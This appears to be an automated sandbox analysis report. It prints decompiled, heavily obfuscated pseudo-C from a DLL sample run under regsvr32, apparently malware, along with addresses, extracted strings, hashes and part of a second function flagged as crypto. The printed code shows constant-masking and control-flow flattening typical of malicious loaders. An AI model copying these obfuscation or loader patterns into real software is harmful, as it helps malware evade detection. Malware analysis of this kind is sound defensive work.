				_v500 = _v500 ^ 0x000268a9;
				_v508 = 0xb15b6b;
				_t826 = 0x71;
				_v508 = _v508 / _t826;
				_v508 = _v508 ^ 0x3f2a7be0;
				_v508 = _v508 << 3;
				_v508 = _v508 ^ 0xf95653e5;
				_v516 = 0x3a8561;
				_t827 = 0x7e;
				_v516 = _v516 * 0x2b;
				_v516 = _v516 + 0x1d14;
				_v516 = _v516 * 0x23;
				_v516 = _v516 ^ 0x580d38ba;
				_v376 = 0xbec2ea;
				_v376 = _v376 / _t827;
				_t828 = 0x44;
				_v376 = _v376 * 0xb;
				_v376 = _v376 ^ 0x001f50b0;
				_v472 = 0xcf94db;
				_v472 = _v472 / _t828;
				_t829 = 3;
				_v472 = _v472 / _t829;
				_t830 = 0x17;
				_v472 = _v472 / _t830;
				_v472 = _v472 ^ 0x0004077b;
				_v308 = 0xf4b9ed;
				_t831 = 0xe;
				_v308 = _v308 * 0x7b;
				_v308 = _v308 ^ 0x7590be5b;
				_v396 = 0xfc97b;
				_v396 = _v396 / _t831;
				_t832 = 0xd;
				_v396 = _v396 / _t832;
				_v396 = _v396 ^ 0x000c7c17;
				_v340 = 0x57d807;
				_v340 = _v340 + 0xe47;
				_v340 = _v340 ^ 0x00567eba;
				_v404 = 0xeb02a1;
				_v404 = _v404 | 0xd435406c;
				_v404 = _v404 << 8;
				_v404 = _v404 ^ 0xff40d177;
				_v412 = 0x3f1932;
				_t833 = 0x48;
				_t845 = _v304;
				_v412 = _v412 * 0x7a;
				_v412 = _v412 ^ 0xa557593f;
				_v412 = _v412 ^ 0xbb4aca2a;
				_v460 = 0xc0b8fa;
				_v460 = _v460 + 0xffff9966;
				_v460 = _v460 >> 2;
				_v460 = _v460 >> 0xc;
				_v460 = _v460 ^ 0x000b6db1;
				_v388 = 0x87af72;
				_v388 = _v388 + 0xffffcd4b;
				_v388 = _v388 >> 3;
				_v388 = _v388 ^ 0x001e24fe;
				_v332 = 0x5a8bbe;
				_v332 = _v332 | 0x98decb14;
				_v332 = _v332 ^ 0x98d7eb38;
				_v452 = 0xb2e458;
				_v452 = _v452 >> 6;
				_v452 = _v452 + 0xeb3e;
				_v452 = _v452 ^ 0x00027d8d;
				_v372 = 0x542d93;
				_t730 = _v304;
				_v372 = _v372 / _t833;
				_t834 = 0x21;
				_v372 = _v372 * 0x57;
				_v372 = _v372 ^ 0x00629f26;
				_v380 = 0x37d848;
				_v380 = _v380 << 3;
				_v380 = _v380 * 0x22;
				_v380 = _v380 ^ 0x3b518193;
				_v420 = 0x85f739;
				_v420 = _v420 | 0x52791ee1;
				_t835 = _v304;
				_v420 = _v420 / _t834;
				_v420 = _v420 ^ 0x02875991;
				_v348 = 0x49513d;
				_v348 = _v348 >> 0xa;
				_v348 = _v348 ^ 0x000a031f;
				while(1) {
					L1:
					_t676 = _v556;
					while(1) {
						_t801 = 0xe7f73b1;
						do {
							while(1) {
								L3:
								_t854 = _t839 - 0x80d4f0f;
								if(_t854 > 0) {
									break;
								}
								if(_t854 == 0) {
									_t843 =  &_v256;
									_push(8);
									_t747 = 0x10;
									_t813 = E1000D763(_t747);
									_t848 = _t846 - 0xc + 0x10;
									__eflags = _t813;
									if(_t813 != 0) {
										_t836 = _t843;
										_t751 = _t813 >> 1;
										__eflags = _t751;
										_t843 = _t843 + _t813 * 2;
										_t710 = memset(_t836, 0x2d002d, _t751 << 2);
										asm("adc ecx, ecx");
										memset(_t836 + _t751, _t710, 0);
										_t848 = _t848 + 0x18;
									}
									_push(8);
									_t849 = _t848 - 0xc;
									_t748 = 0x10;
									_t835 = E1000D763(_t748);
									_push(_t835);
									_push(_v344);
									_push(_t843);
									_t749 = 0xb;
									E1001DF4E(_t749, _v384);
									_t839 = 0x1060f53;
									L11:
									_t846 = _t849 + 0x1c;
									L12:
									_t676 = _v556;
									L13:
									_t737 = _v468;
									_t801 = 0xe7f73b1;
									continue;
								}
								if(_t839 == 0x5bbd59) {
									_t835 = _t835 +  *((intOrPtr*)(_t737 + 4));
									_push(_t737);
									_t845 = E1001EAA3(_t835);
									_t676 = _v556;
									__eflags = _t845;
									_t737 = _v468;
									_t801 = 0xe7f73b1;
									_t839 =  !=  ? 0xe7f73b1 : 0x80fc3d0;
									continue;
								}
								if(_t839 == 0x817936) {
									E10011D1C( *((intOrPtr*)(_t737 + 4)), _v376, _v472, _v308, _t730,  *_t737);
									_t737 = _v468;
									_t846 =  &(_t846[4]);
									_t839 = 0xd7ada16;
									_t730 = _t730 +  *((intOrPtr*)(_t737 + 4));
									goto L1;
								}
								if(_t839 != 0x1060f53) {
									if(_t839 == 0x2a971b8) {
										_t839 = 0xe689a77;
										continue;
									} else {
										if(_t839 != 0x7e7ca72) {
											goto L31;
										} else {
											_push(4);
											_t849 = _t846 - 0xc;
											_t759 = 0x10;
											_t835 = E1000D763(_t759);
											_push(_t835);
											_push(_v360);
											_push( &_v128);
											_t760 = 0xb;
											E1001DF4E(_t760, _v536);
											_t839 = 0x80d4f0f;
											goto L11;
										}
									}
									L34:
									return _t676;
								}
								_t835 = 0x4000;
								_push(0x4000);
								_t676 = E1001EAA3(0x4000);
								_v556 = _t676;
								__eflags = _t676;
								if(_t676 != 0) {
									_t839 = 0xfe050de;
									goto L13;
								}
								goto L34;
							}
							__eflags = _t839 - 0x80fc3d0;
							if(_t839 == 0x80fc3d0) {
								E10006A8D(_v420, _v348, _t676);
								_t737 = _v468;
								_t676 = 0;
								__eflags = 0;
								_v556 = 0;
								_t839 = 0xd6e37ad;
								_t801 = 0xe7f73b1;
								goto L31;
							} else {
								__eflags = _t839 - 0xd7ada16;
								if(__eflags == 0) {
									_push(0x100010b4);
									_push(_v412);
									_push(_v404);
									_t681 = E1000C4B0( &_v256, _v460, _v388, _v332, E1001E18B(_v396, _v340, __eflags), _v300 - _t730);
									E1000B9D7(_v452, _v372, _t678, _v380);
									_t683 = _v304;
									_t732 = _t730 + _t681 - _t845;
									__eflags = _t732;
									 *_t683 = _t845;
									 *(_t683 + 4) = _t732;
									return _v556;
								}
								__eflags = _t839 - 0xe689a77;
								if(_t839 == 0xe689a77) {
									_push(1);
									_t849 = _t846 - 0xc;
									_t741 = 8;
									_t835 = E1000D763(_t741);
									_push(_t835);
									_push(_v484);
									_push( &_v288);
									_t742 = 9;
									E1001DF4E(_t742, _v476);
									_t839 = 0x7e7ca72;
									goto L11;
								} else {
									__eflags = _t839 - _t801;
									if(__eflags == 0) {
										_push(0x10001174);
										_push(_v548);
										_push(_v540);
										_v300 = _t835 + _t845;
										_t730 = E10019556(_v364, __eflags, _v312, _v328, _v524, _t845, E1001E18B(_v532, _v320, __eflags),  &_v288,  &_v256, _v444, _v408,  &_v128) + _t845;
										E1000B9D7(_v500, _v508, _t692, _v516);
										_t846 =  &(_t846[0xf]);
										_t839 = 0x817936;
										goto L12;
									} else {
										__eflags = _t839 - 0xfe050de;
										if(_t839 != 0xfe050de) {
											goto L31;
										} else {
											_push(_v324);
											_push(_v448);
											_push(_v392);
											_t725 = E10004BB4(0x10001114, _v480);
											_push( &_v256);
											_push(_t725);
											_push(_t835);
											_push(_v556);
											 *((intOrPtr*)(E1000F56B(0xb32137d5, 0x1a3)))();
											E1000B9D7(_v552, _v336, _t725, _v504);
											_t846 =  &(_t846[9]);
											_t839 = 0x5bbd59;
											goto L12;
										}
									}
								}
							}
							goto L34;
							L31:
							__eflags = _t839 - 0xd6e37ad;
						} while (_t839 != 0xd6e37ad);
						return _t676;
					}
				}
			}

0x100195a8
0x100195b2
0x100195b9
0x100195bd
0x100195c5
0x100195d0
0x100195db
0x100195e6
0x100195f1
0x100195fc
0x10019604
0x1001960c
0x10019614
0x1001961c
0x10019624
0x1001962f
0x1001963a
0x10019645
0x10019650
0x10019658
0x10019663
0x1001966e
0x10019676
0x1001967e
0x10019686
0x1001968e
0x10019696
0x1001969e
0x100196aa
0x100196b3
0x100196b8
0x100196be
0x100196c3
0x100196cb
0x100196d8
0x100196db
0x100196df
0x100196e7
0x100196ef
0x100196f7
0x100196ff
0x10019707
0x1001970f
0x10019717
0x1001971f
0x1001972c
0x10019738
0x1001973c
0x10019740
0x10019748
0x10019753
0x10019766
0x10019767
0x1001976e
0x10019779
0x10019787
0x1001978b
0x10019793
0x1001979b
0x100197a3
0x100197ae
0x100197b9
0x100197c4
0x100197cf
0x100197dc
0x100197e4
0x100197ef
0x100197f7
0x10019806
0x10019807
0x1001980b
0x10019813
0x1001981b
0x10019826
0x1001982e
0x10019836
0x10019841
0x1001984c
0x10019857
0x10019862
0x1001986d
0x10019878
0x10019880
0x1001988b
0x10019893
0x1001989b
0x100198a3
0x100198ab
0x100198b3
0x100198be
0x100198c9
0x100198d4
0x100198dc
0x100198e4
0x100198e9
0x100198f1
0x100198f9
0x10019904
0x1001990f
0x1001991a
0x10019925
0x10019930
0x1001993b
0x10019946
0x10019951
0x1001995c
0x10019967
0x10019972
0x10019985
0x1001998c
0x10019997
0x1001999f
0x100199a7
0x100199b4
0x100199b8
0x100199c0
0x100199cb
0x100199d6
0x100199e1
0x100199ec
0x100199f4
0x100199f9
0x10019a01
0x10019a09
0x10019a14
0x10019a1d
0x10019a24
0x10019a2f
0x10019a37
0x10019a3f
0x10019a4c
0x10019a50
0x10019a58
0x10019a63
0x10019a6e
0x10019a79
0x10019a89
0x10019a8e
0x10019a94
0x10019a9c
0x10019aa0
0x10019aa8
0x10019ab5
0x10019ab8
0x10019abc
0x10019acc
0x10019ad0
0x10019ad8
0x10019ae5
0x10019ae8
0x10019aec
0x10019afc
0x10019b00
0x10019b08
0x10019b10
0x10019b1d
0x10019b1e
0x10019b27
0x10019b2b
0x10019b33
0x10019b3e
0x10019b46
0x10019b4d
0x10019b58
0x10019b60
0x10019b65
0x10019b6d
0x10019b75
0x10019b7d
0x10019b85
0x10019b8d
0x10019b95
0x10019b9d
0x10019ba5
0x10019bb0
0x10019bbb
0x10019bc6
0x10019bd1
0x10019bdc
0x10019be7
0x10019bf2
0x10019bfa
0x10019c05
0x10019c12
0x10019c16
0x10019c1b
0x10019c23
0x10019c2b
0x10019c36
0x10019c4a
0x10019c51
0x10019c5c
0x10019c67
0x10019c6f
0x10019c76
0x10019c81
0x10019c8c
0x10019c94
0x10019c9e
0x10019cac
0x10019cb1
0x10019cb7
0x10019cbf
0x10019ccb
0x10019cd0
0x10019cd6
0x10019cde
0x10019ce3
0x10019ceb
0x10019cf8
0x10019cfb
0x10019cff
0x10019d0c
0x10019d10
0x10019d18
0x10019d2e
0x10019d3d
0x10019d40
0x10019d47
0x10019d52
0x10019d62
0x10019d6a
0x10019d6f
0x10019d79
0x10019d7e
0x10019d84
0x10019d8c
0x10019d9f
0x10019da2
0x10019da9
0x10019db4
0x10019dca
0x10019dd8
0x10019ddb
0x10019de2
0x10019ded
0x10019df8
0x10019e03
0x10019e0e
0x10019e19
0x10019e24
0x10019e2c
0x10019e37
0x10019e4e
0x10019e51
0x10019e58
0x10019e5f
0x10019e6a
0x10019e75
0x10019e7d
0x10019e85
0x10019e8a
0x10019e8f
0x10019e97
0x10019ea2
0x10019ead
0x10019eb5
0x10019ec0
0x10019ecb
0x10019ed6
0x10019ee1
0x10019ef1
0x10019ef6
0x10019efe
0x10019f06
0x10019f1c
0x10019f23
0x10019f32
0x10019f33
0x10019f3a
0x10019f45
0x10019f50
0x10019f60
0x10019f67
0x10019f72
0x10019f7d
0x10019f91
0x10019f98
0x10019f9f
0x10019faa
0x10019fb5
0x10019fbd
0x10019fc8
0x10019fc8
0x10019fc8
0x10019fcc
0x10019fcc
0x10019fd1
0x10019fd1
0x10019fd1
0x10019fd1
0x10019fd7
0x00000000
0x00000000
0x10019fdd
0x1001a10d
0x1001a126
0x1001a12d
0x1001a133
0x1001a135
0x1001a138
0x1001a13a
0x1001a13e
0x1001a140
0x1001a140
0x1001a142
0x1001a14a
0x1001a14c
0x1001a14e
0x1001a14e
0x1001a14e
0x1001a167
0x1001a169
0x1001a16e
0x1001a174
0x1001a176
0x1001a177
0x1001a185
0x1001a188
0x1001a189
0x1001a18e
0x1001a05a
0x1001a05a
0x1001a05d
0x1001a05d
0x1001a061
0x1001a061
0x10019fcc
0x00000000
0x10019fcc
0x10019fe9
0x1001a0d4
0x1001a0df
0x1001a0e7
0x1001a0ee
0x1001a0f2
0x1001a0f5
0x1001a0f9
0x1001a0fe
0x00000000
0x1001a0fe
0x10019ff5
0x1001a0bb
0x1001a0c0
0x1001a0c4
0x1001a0c7
0x1001a0cc
0x00000000
0x1001a0cc
0x1001a001
0x1001a009
0x1001a06a
0x00000000
0x1001a00b
0x1001a011
0x00000000
0x1001a017
0x1001a02a
0x1001a02c
0x1001a031
0x1001a037
0x1001a040
0x1001a041
0x1001a04c
0x1001a04f
0x1001a050
0x1001a055
0x00000000
0x1001a055
0x1001a011
0x1001a3e5
0x1001a3e5
0x1001a3e5
0x1001a087
0x1001a089
0x1001a08a
0x1001a08f
0x1001a094
0x1001a096
0x1001a09c
0x00000000
0x1001a09c
0x00000000
0x1001a096
0x1001a198
0x1001a19e
0x1001a328
0x1001a32e
0x1001a332
0x1001a332
0x1001a334
0x1001a338
0x1001a33d
0x00000000
0x1001a1a4
0x1001a1a4
0x1001a1aa
0x1001a353
0x1001a358
0x1001a35f
0x1001a3a4
0x1001a3c1
0x1001a3c6
0x1001a3d0
0x1001a3d0
0x1001a3d2
0x1001a3d4
0x00000000
0x1001a3d7
0x1001a1b0
0x1001a1b6
0x1001a2e7
0x1001a2e9
0x1001a2ee
0x1001a2f4
0x1001a2fd
0x1001a2fe
0x1001a306
0x1001a309
0x1001a30a
0x1001a30f
0x00000000
0x1001a1bc
0x1001a1bc
0x1001a1be
0x1001a236
0x1001a23b
0x1001a242
0x1001a251
0x1001a2b9
0x1001a2bc
0x1001a2c1
0x1001a2c4
0x00000000
0x1001a1c0
0x1001a1c0
0x1001a1c6
0x00000000
0x1001a1cc
0x1001a1cc
0x1001a1d8
0x1001a1df
0x1001a1ea
0x1001a200
0x1001a201
0x1001a202
0x1001a203
0x1001a212
0x1001a224
0x1001a229
0x1001a22c
0x00000000
0x1001a22c
0x1001a1c6
0x1001a1be
0x1001a1b6
0x00000000
0x1001a342
0x1001a342
0x1001a342
0x00000000
0x10019fd1
0x10019fcc

Strings

8G, xrefs: 10019C1B
BcR[, xrefs: 10019C36
0+(, xrefs: 10019A14
>, xrefs: 10019EF6
1k, xrefs: 10019B3E
N!, xrefs: 10019C67
{*?, xrefs: 10019CD6
*K, xrefs: 100195FC
w, xrefs: 100197A3
=QI, xrefs: 10019FAA
+, xrefs: 1001970F

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +$0+($1k$8G$=QI$>$BcR[$N!$*K$w${*?
API String ID: 0-1148241830
Opcode ID: 46ab3e250f048ee4018abf7efb2c627b4baa44a4eafe1c228b992dbd75417821
Instruction ID: ec1b8a8326a6647e98a0913dc550a31492ec1d9ba89d5538fa1546841290c585
Opcode Fuzzy Hash: 46ab3e250f048ee4018abf7efb2c627b4baa44a4eafe1c228b992dbd75417821
Instruction Fuzzy Hash: 53721F719093818BD374CF25C586B8FFBE1FBC4354F10892EE6998A260D7B49989CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1000E379 Relevance: 14.4, Strings: 11, Instructions: 612
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000E379(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				void* _t627;
				void* _t697;
				void* _t709;
				void* _t717;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				void* _t742;
				void* _t810;
				signed int _t824;
				void* _t825;
				intOrPtr _t827;
				intOrPtr _t830;
				signed int* _t832;
				void* _t839;

				_push(_a24);
				_t827 = __edx;
				_push(_a20);
				_v36 = __edx;
				_push(_a16);
				_push(_a12);
				_push(0x20);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t627);
				_v20 = 0x7ea981;
				_t832 =  &(( &_v308)[8]);
				_v16 = 0x2601ba;
				_t830 = 0;
				_v12 = 0x249f2;
				_v8 = 0;
				_t717 = 0x36290e8;
				_v288 = 0x67cb05;
				_v288 = _v288 << 2;
				_t724 = 0x53;
				_v288 = _v288 / _t724;
				_v288 = _v288 << 2;
				_v288 = _v288 ^ 0x0014021c;
				_v108 = 0xa206fa;
				_v108 = _v108 << 4;
				_v108 = _v108 ^ 0x0a206fa0;
				_v192 = 0xf3859a;
				_v192 = _v192 ^ 0x225d79c2;
				_v192 = _v192 | 0x8359f585;
				_v192 = _v192 ^ 0xa3fffddd;
				_v252 = 0xdca832;
				_v252 = _v252 ^ 0x1a23d0c9;
				_v252 = _v252 + 0x238c;
				_v252 = _v252 >> 5;
				_v252 = _v252 ^ 0x00d7fce4;
				_v224 = 0xb95b97;
				_v224 = _v224 | 0xce852ee6;
				_v224 = _v224 >> 7;
				_v224 = _v224 ^ 0x019d7aff;
				_v120 = 0x2397af;
				_v120 = _v120 + 0xffff3e32;
				_v120 = _v120 ^ 0x0022d5e1;
				_v88 = 0x5d9211;
				_v88 = _v88 | 0x9e7565ab;
				_v88 = _v88 ^ 0x9e7df7bb;
				_v140 = 0x1f8830;
				_v140 = _v140 + 0xffffdc8c;
				_t725 = 0x3e;
				_v140 = _v140 / _t725;
				_v140 = _v140 ^ 0x0000819f;
				_v196 = 0x51637;
				_t726 = 0x7a;
				_v196 = _v196 * 0x5f;
				_v196 = _v196 * 0x64;
				_v196 = _v196 ^ 0xbcc46104;
				_v92 = 0x5e914d;
				_v92 = _v92 * 0x75;
				_v92 = _v92 ^ 0x2b386831;
				_v272 = 0x780130;
				_v272 = _v272 / _t726;
				_v272 = _v272 + 0xffff6772;
				_v272 = _v272 | 0xbf841560;
				_v272 = _v272 ^ 0xbf847762;
				_v144 = 0xf6b9ed;
				_v144 = _v144 + 0xf745;
				_v144 = _v144 + 0xffff3581;
				_v144 = _v144 ^ 0x00f6e6b3;
				_v304 = 0x3e12c4;
				_v304 = _v304 >> 0xa;
				_t727 = 0x4f;
				_v304 = _v304 / _t727;
				_t728 = 0x5e;
				_v304 = _v304 * 0x1c;
				_v304 = _v304 ^ 0x0001f338;
				_v180 = 0xe403a5;
				_v180 = _v180 | 0x442ec1be;
				_v180 = _v180 >> 0xa;
				_v180 = _v180 ^ 0x001984e2;
				_v124 = 0xabab0c;
				_v124 = _v124 | 0x89965ca8;
				_v124 = _v124 ^ 0x89b6a60d;
				_v200 = 0x507ad6;
				_v200 = _v200 / _t728;
				_v200 = _v200 ^ 0x4c8be55e;
				_v200 = _v200 ^ 0x4c820882;
				_v116 = 0x1ab362;
				_v116 = _v116 ^ 0x393de21f;
				_v116 = _v116 ^ 0x392a456e;
				_v240 = 0x323c0e;
				_v240 = _v240 ^ 0xe39b5419;
				_v240 = _v240 | 0xb5b0511c;
				_v240 = _v240 >> 0xa;
				_v240 = _v240 ^ 0x003da1bc;
				_v56 = 0x21eb8b;
				_v56 = _v56 + 0xd71b;
				_v56 = _v56 ^ 0x00267110;
				_v132 = 0x7b1127;
				_v132 = _v132 << 7;
				_v132 = _v132 ^ 0x3d80f5d6;
				_v68 = 0xa50a03;
				_v68 = _v68 ^ 0x6058f740;
				_v68 = _v68 ^ 0x60fdd8f9;
				_v264 = 0xa53101;
				_v264 = _v264 + 0xffffa59a;
				_t729 = 0x54;
				_t824 = 0x3d;
				_v264 = _v264 * 0xe;
				_v264 = _v264 * 0x1d;
				_v264 = _v264 ^ 0x056712d1;
				_v296 = 0x595932;
				_v296 = _v296 / _t729;
				_v296 = _v296 + 0xffffcd7c;
				_v296 = _v296 << 1;
				_v296 = _v296 ^ 0x0006404c;
				_v48 = 0x425b76;
				_v48 = _v48 + 0xffff6cdd;
				_v48 = _v48 ^ 0x00466367;
				_v156 = 0xabd7cc;
				_v156 = _v156 + 0xffffa64d;
				_v156 = _v156 + 0x9bc0;
				_v156 = _v156 ^ 0x00ac3bb8;
				_v220 = 0x89de90;
				_v220 = _v220 + 0x612f;
				_v220 = _v220 / _t824;
				_v220 = _v220 ^ 0x0000b32e;
				_v212 = 0x7de933;
				_v212 = _v212 << 0x10;
				_v212 = _v212 << 0xe;
				_v212 = _v212 ^ 0xc00a68ff;
				_v280 = 0xc81993;
				_v280 = _v280 >> 0xa;
				_v280 = _v280 + 0xc2e6;
				_t730 = 0x42;
				_v280 = _v280 / _t730;
				_v280 = _v280 ^ 0x000679c0;
				_v248 = 0x3ea167;
				_v248 = _v248 + 0x7ddd;
				_t731 = 0x21;
				_v248 = _v248 * 0x2e;
				_v248 = _v248 ^ 0xd65afb26;
				_v248 = _v248 ^ 0xdd05f3d5;
				_v276 = 0xdd8b22;
				_v276 = _v276 >> 5;
				_v276 = _v276 / _t731;
				_t732 = 0x2c;
				_v276 = _v276 * 0x68;
				_v276 = _v276 ^ 0x001d72bc;
				_v284 = 0x865130;
				_v284 = _v284 | 0x24beb5f7;
				_v284 = _v284 / _t732;
				_t733 = 0x68;
				_v284 = _v284 * 0x35;
				_v284 = _v284 ^ 0x2c40b9e6;
				_v232 = 0xe7030c;
				_v232 = _v232 / _t733;
				_v232 = _v232 ^ 0x6e477f4f;
				_v232 = _v232 ^ 0x6e42226d;
				_v292 = 0xd8dd5b;
				_v292 = _v292 >> 4;
				_v292 = _v292 ^ 0xfff74e45;
				_v292 = _v292 + 0xfa8a;
				_v292 = _v292 ^ 0xfffdbc20;
				_v160 = 0x66d761;
				_v160 = _v160 + 0xffff844d;
				_t734 = 0x4f;
				_v160 = _v160 / _t734;
				_v160 = _v160 ^ 0x0006b53e;
				_v168 = 0x3e99fe;
				_v168 = _v168 << 0xb;
				_v168 = _v168 | 0xc6ec067a;
				_v168 = _v168 ^ 0xf6ebc5e5;
				_v260 = 0x7d0def;
				_t735 = 0x2b;
				_v260 = _v260 / _t735;
				_v260 = _v260 >> 3;
				_v260 = _v260 << 6;
				_v260 = _v260 ^ 0x001fbefc;
				_v176 = 0x128fd0;
				_v176 = _v176 + 0x6b7;
				_t736 = 0x4b;
				_v176 = _v176 / _t736;
				_v176 = _v176 ^ 0x0002f838;
				_v184 = 0xe27b0d;
				_v184 = _v184 | 0x6a67300a;
				_t737 = 0x22;
				_v184 = _v184 * 0x72;
				_v184 = _v184 ^ 0x9b13dd2c;
				_v268 = 0x452ff3;
				_v268 = _v268 / _t737;
				_v268 = _v268 << 3;
				_t738 = 0x5f;
				_v268 = _v268 * 0x79;
				_v268 = _v268 ^ 0x07b36e39;
				_v236 = 0xbd27b7;
				_v236 = _v236 | 0x77fffbfb;
				_v236 = _v236 ^ 0x77fd5920;
				_v244 = 0x968557;
				_v244 = _v244 ^ 0x8b8681d4;
				_v244 = _v244 + 0xffffbe4d;
				_v244 = _v244 * 3;
				_v244 = _v244 ^ 0xa1285cc8;
				_v80 = 0x95d0a5;
				_v80 = _v80 << 0xc;
				_v80 = _v80 ^ 0x5d0c3c24;
				_v308 = 0xa3bfc8;
				_v308 = _v308 + 0xffff42b3;
				_v308 = _v308 >> 0xc;
				_v308 = _v308 / _t824;
				_v308 = _v308 ^ 0x000d25f7;
				_v52 = 0xca597c;
				_v52 = _v52 + 0x9e31;
				_v52 = _v52 ^ 0x00c6b75d;
				_v208 = 0x8463e7;
				_v208 = _v208 ^ 0xe09b26b3;
				_v208 = _v208 ^ 0x2acab697;
				_v208 = _v208 ^ 0xcad09901;
				_v216 = 0x20fa73;
				_v216 = _v216 << 2;
				_v216 = _v216 >> 0xd;
				_v216 = _v216 ^ 0x000721cb;
				_v96 = 0x695efd;
				_v96 = _v96 * 0x5d;
				_v96 = _v96 ^ 0x2642c18a;
				_v104 = 0xd29ae6;
				_v104 = _v104 >> 8;
				_v104 = _v104 ^ 0x0001657d;
				_v112 = 0xa3f07c;
				_v112 = _v112 | 0x063cc158;
				_v112 = _v112 ^ 0x06b8fe5f;
				_v204 = 0xa0febe;
				_v204 = _v204 * 0x5d;
				_v204 = _v204 / _t738;
				_v204 = _v204 ^ 0x009d892d;
				_v172 = 0x83ab4b;
				_v172 = _v172 << 5;
				_v172 = _v172 | 0x0f6faa49;
				_v172 = _v172 ^ 0x1f72d591;
				_v256 = 0xd32340;
				_t739 = 0x53;
				_t825 = 0x7d3743d;
				_v256 = _v256 * 0x41;
				_v256 = _v256 ^ 0xc39d323a;
				_v256 = _v256 >> 0xa;
				_v256 = _v256 ^ 0x003c50f3;
				_v100 = 0x972d0d;
				_v100 = _v100 | 0xe3281e3b;
				_v100 = _v100 ^ 0xe3b508ff;
				_v148 = 0x14b4d9;
				_v148 = _v148 / _t739;
				_v148 = _v148 ^ 0x1f369c57;
				_v148 = _v148 ^ 0x1f358972;
				_v188 = 0x3cabe;
				_t740 = 0x51;
				_v188 = _v188 * 0x46;
				_v188 = _v188 | 0x2300f56a;
				_v188 = _v188 ^ 0x230609c3;
				_v60 = 0xb0c05a;
				_v60 = _v60 >> 0xe;
				_v60 = _v60 ^ 0x00017120;
				_v164 = 0xb56277;
				_v164 = _v164 >> 1;
				_v164 = _v164 + 0xffff52a5;
				_v164 = _v164 ^ 0x0056ac72;
				_v300 = 0xde9cf0;
				_v300 = _v300 / _t740;
				_v300 = _v300 ^ 0x3c456d88;
				_v300 = _v300 ^ 0x4d9ba14a;
				_v300 = _v300 ^ 0x71d0c6cd;
				_v128 = 0xaf449d;
				_v128 = _v128 | 0x6484c2e1;
				_v128 = _v128 ^ 0x64ad7193;
				_v76 = 0x1e8c28;
				_v76 = _v76 + 0xffff3d43;
				_v76 = _v76 ^ 0x0013860b;
				_v64 = 0x3d056;
				_v64 = _v64 | 0x3b65ab6e;
				_v64 = _v64 ^ 0x3b62b50a;
				_v84 = 0xe2a63;
				_v84 = _v84 + 0x2b45;
				_v84 = _v84 ^ 0x00001705;
				_v228 = 0xcba675;
				_t741 = 0x6f;
				_v228 = _v228 / _t741;
				_v228 = _v228 >> 9;
				_v228 = _v228 ^ 0x0007af1c;
				_v136 = 0x4a4555;
				_v136 = _v136 + 0xffff1975;
				_v136 = _v136 ^ 0x0280cac3;
				_v136 = _v136 ^ 0x02c88b40;
				_v72 = 0x558912;
				_v72 = _v72 * 0x4c;
				_v72 = _v72 ^ 0x196144b2;
				_v152 = 0xa6198e;
				_v152 = _v152 ^ 0x7cd7e3f4;
				_v152 = _v152 << 8;
				_v152 = _v152 ^ 0x71fb6635;
				while(1) {
					L1:
					while(1) {
						L2:
						_t742 = 0x85af73e;
						while(1) {
							L3:
							do {
								while(1) {
									L4:
									_t839 = _t717 - _t825;
									if(_t839 > 0) {
										break;
									}
									if(_t839 == 0) {
										E1000D5CB(_v136, _v40, _v72, _v144, _v152);
									} else {
										if(_t717 == 0x14f8bb8) {
											_push(_t742);
											_v32 = E1001EAA3(_v28);
											_t742 = 0x85af73e;
											_t717 =  !=  ? 0x85af73e : _t825;
											_t697 = 0x594068d;
											goto L3;
										} else {
											if(_t717 == 0x36290e8) {
												_t717 = 0x7075a88;
												continue;
											} else {
												if(_t717 == _t697) {
													E1000B8F4(_v92, _v44, _v148, _a24, 0x20, _v188, _v60, _v164);
													_t832 =  &(_t832[6]);
													_t717 = 0xd849526;
													_t830 =  ==  ? 1 : _t830;
													while(1) {
														L1:
														goto L2;
													}
												} else {
													if(_t717 == _t810) {
														E100041C6(_v140, _a12, _v204, _v172, _v256, _v100, _v44, _t827);
														_t832 =  &(_t832[6]);
														_t697 = 0x594068d;
														_t717 =  ==  ? 0x594068d : 0xd849526;
														L2:
														_t742 = 0x85af73e;
														L3:
														continue;
													} else {
														if(_t717 == 0x7075a88) {
															_push(_v200);
															_push(_v124);
															_push(_v180);
